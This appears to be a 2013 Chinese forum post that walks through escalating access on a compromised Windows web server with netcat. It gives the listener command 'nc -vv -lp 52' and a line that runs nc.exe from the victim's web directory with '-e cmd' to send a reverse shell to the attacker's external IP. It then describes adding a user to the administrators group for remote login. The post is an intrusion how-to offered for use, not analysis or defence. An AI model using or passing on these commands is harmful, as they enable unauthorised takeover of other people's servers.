Server-U等都不可以用的情况下.   一般都可思考用此方法
不过这种方法, 只要对方装了防火墙, 或是屏蔽掉了除常用的那几个端口外的所有端口…   那么这种方法也失效了….

1:通过shell将上传NC和CMD传到站点目录下(这里一定上传的注意权限,最好是可读写目录下)
web目录都是有写有读的权限,我们直接传NC进去
Windows下NC反弹cmd提权方法

1.jpg (35.34 KB, 下载次数: 0)

下载附件  保存到相册

2013-4-19 16:03 上传


2:然后本地执行nc -vv -lp 52进行反弹
Windows下NC反弹cmd提权方法

2.jpg (19.79 KB, 下载次数: 0)

下载附件  保存到相册

2013-4-19 16:04 上传


3:在shell命令下执行
F:wwwrootimgnc.exe  -e cmd上传路径  IP(外网IP)  52(这里是本机端口)
Windows下NC反弹cmd提权方法

3.jpg (17.38 KB, 下载次数: 0)

下载附件  保存到相册

2013-4-19 16:04 上传


4:在shell里执行命令后,马上看到本地CMS里已经反弹上去了,执行net user 也是成功.
Windows下NC反弹cmd提权方法

4.jpg (26.45 KB, 下载次数: 0)

下载附件  保存到相册

2013-4-19 16:05 上传


5:直接添加用户,然后远程去连接!
Windows下NC反弹cmd提权方法

5.jpg (17.17 KB, 下载次数: 0)

下载附件  保存到相册

2013-4-19 16:05 上传


看到添加成功,也设置为管理组了!接下来直接远程连接就OK!

发表评论

电子邮件地址不会被公开。 必填项已用*标注